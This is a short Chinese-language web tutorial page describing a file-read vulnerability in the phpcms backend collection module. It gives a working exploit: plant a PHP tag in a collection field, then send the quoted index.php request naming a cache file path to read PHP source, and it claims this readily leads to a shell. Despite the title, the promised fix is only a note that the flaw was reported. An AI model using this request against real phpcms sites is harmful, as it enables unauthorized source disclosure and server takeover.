欢迎来到入门教程网!

phpcms

当前位置:主页 > CMS教程 > phpcms >

phpcms后台普通用户读文件0day的分析以及修复方法

来源:本站原创|时间:2020-01-10|栏目:phpcms|点击:

后台采集里设置采集模块中title 或者其他的内容都可以 设置为<?php[内容]?>
然后用下面的代码就可以读取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不难了。具体如何利用看大家自己了。(别跟我说只会读数据库连接文件,并且还不能连),反正我是可以拿到shell。
修复:已提交给官方,等待补丁

上一篇:phpcms V9 常用文件目录结构

栏    目:phpcms

下一篇:Phpcms V9 调用全站文章排行的解决方法

本文标题:phpcms后台普通用户读文件0day的分析以及修复方法

本文地址:https://www.xiuzhanwang.com/a1/phpcms/9901.html

网页制作CMS教程网络编程软件编程脚本语言数据库服务器

如果侵犯了您的权利,请与我们联系,我们将在24小时内进行处理、任何非本站因素导致的法律后果,本站均不负任何责任。

联系QQ:835971066 | 邮箱:835971066#qq.com(#换成@)

Copyright © 2002-2020 脚本教程网 版权所有